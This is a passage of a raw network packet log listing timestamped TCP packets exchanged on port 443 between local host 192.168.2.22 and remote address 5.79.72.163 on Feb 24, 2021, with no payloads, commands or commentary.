Feb 24, 2021 12:53:27.999171019 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.999188900 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.999229908 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.999293089 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.999309063 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.999335051 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.999346972 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.999769926 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.999797106 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.999814034 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.999826908 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.999838114 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.999847889 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.999871016 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.999891996 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.999902010 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.999923944 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.999932051 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.999943972 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.999958038 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.999960899 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.999973059 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.999978065 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.999988079 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.999991894 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.000005007 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.000010014 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.000027895 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.000031948 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.000041962 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.000046968 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.000067949 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.000081062 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.002031088 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.009974957 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.009994984 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.010006905 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.010039091 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.010061026 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.010061979 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.010082960 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.010086060 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.010092974 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.027967930 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028022051 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028083086 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028105974 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028137922 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028146029 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028309107 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028342962 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028357983 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028363943 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028374910 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028384924 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028399944 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028400898 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028419971 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028424025 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028439045 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028439999 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028455019 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028461933 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028470993 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028479099 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028497934 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028518915 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028518915 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028544903 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028561115 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028563023 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028585911 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028599024 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028608084 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028624058 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028626919 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028644085 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028662920 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028754950 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028793097 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028812885 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028827906 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.028851986 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.028868914 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.030977011 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.031035900 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.031081915 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.031126022 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.031388998 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.031436920 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.031465054 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.031507015 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.032299042 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.034867048 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.034921885 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.035423994 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035480976 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.035550117 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035566092 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035583019 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035605907 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.035614967 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035629034 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.035629988 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035645962 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035655022 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.035676956 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035690069 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.035693884 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035712957 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035729885 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035732031 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.035743952 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035759926 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.035759926 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035775900 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035788059 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.035789967 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035806894 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035820007 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.035823107 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035841942 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035846949 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.035860062 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035872936 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.035875082 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.035895109 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.035919905 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.036133051 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.036148071 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.036196947 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.036384106 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.036403894 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.036449909 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.036457062 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.036474943 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.036489964 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.036505938 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.036508083 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.036521912 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.036533117 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.036537886 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.036561966 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.036575079 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.036586046 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.036633968 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.036921978 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.036978006 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.037039995 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.037087917 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.037095070 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.037148952 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.037312984 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.037363052 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.037379026 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.037405014 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.037424088 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.037425995 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.037452936 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.037463903 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.037470102 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.037497044 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.037511110 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.037513971 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.037525892 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.037533045 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.037549973 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.037558079 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.037564993 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.037580967 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.037594080 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.037617922 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.038134098 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.038156033 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.038180113 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.038187027 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.038207054 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.038228989 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.038230896 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.038266897 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.038279057 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.038312912 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.038350105 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.038372993 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.038428068 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.038428068 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.038472891 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.038877010 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.047641993 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.047666073 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.047677994 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.047689915 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.047744989 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.047760010 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.047986031 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.048008919 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.048024893 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.048032045 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.048043966 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.048062086 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.048495054 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.048518896 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.048536062 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.048543930 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.048553944 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.048568964 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.064290047 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.064410925 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.064455986 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.064471960 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.064486980 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.064511061 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.064519882 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.064544916 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.064563990 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.064565897 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.064590931 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.064608097 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.064691067 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.064738035 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.064790964 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.064837933 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.064939976 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.064985991 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.064995050 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065017939 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065037966 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065038919 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065054893 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065062046 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065076113 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065083981 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065098047 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065107107 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065121889 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065131903 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065145969 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065155983 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065167904 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065180063 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065205097 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065222025 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065314054 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065352917 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065359116 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065376997 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065396070 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065431118 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065455914 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065489054 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065501928 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065511942 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065521955 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065534115 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065542936 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065562010 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065565109 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065593958 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065607071 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065618038 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065639973 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065642118 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065654993 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065665007 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065681934 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065686941 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.065696955 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.065732002 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.066452026 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.066500902 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.067229033 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.067245960 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.067279100 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.067303896 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.067320108 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.067338943 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.067344904 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.067359924 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.067375898 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.067389011 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.067413092 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.067433119 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.067461014 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.067475080 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.067483902 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.067507982 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.067518950 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.067533016 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.067559004 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.068108082 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.069674015 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.069724083 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.069806099 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.069849968 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.070362091 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.070410013 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.070437908 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.070480108 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.070735931 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.070759058 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.070780039 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.070781946 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.070796967 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.070811033 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.070837975 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.070859909 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.070878983 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.070899010 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.070961952 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.070991039 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071007967 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.071011066 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071072102 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.071073055 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071116924 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.071187019 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071218967 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071229935 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.071259022 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071259975 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.071290970 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071300030 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.071316004 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071331978 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.071348906 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.071352005 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071387053 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071403980 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.071429014 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071429014 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.071465969 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071470022 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.071496964 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071505070 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.071520090 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071537971 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.071540117 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071557999 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.071562052 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.071578979 CET	49166	443	192.168.2.22	5.79.72.163
